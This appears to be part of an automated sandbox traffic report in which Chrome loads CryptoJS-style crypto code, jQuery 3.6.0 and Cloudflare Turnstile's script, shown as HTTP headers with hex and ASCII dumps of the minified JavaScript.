                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                              Data Ascii: =this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63
                                                                              Data Ascii: is._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBloc
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33
                                                                              Data Ascii: =0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d
                                                                              Data Ascii: r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f
                                                                              Data Ascii: th):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.wo
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
                                                                              Data Ascii: (o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d
                                                                              Data Ascii: i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b
                                                                              Data Ascii: S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.449770151.101.2.1374438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:56 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC613INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Date: Thu, 03 Oct 2024 01:13:56 GMT
                                                                              Age: 1869007
                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740061-EWR
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 5889, 1
                                                                              X-Timer: S1727918037.737998,VS0,VE1
                                                                              Vary: Accept-Encoding
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                              Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                              Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                              Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                              Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                              2024-10-03 01:13:56 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                              Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.449771104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:57 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:57 UTC441INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:57 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47262
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912952a6e32e4-EWR
                                                                              2024-10-03 01:13:57 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                              2024-10-03 01:13:57 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                              Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
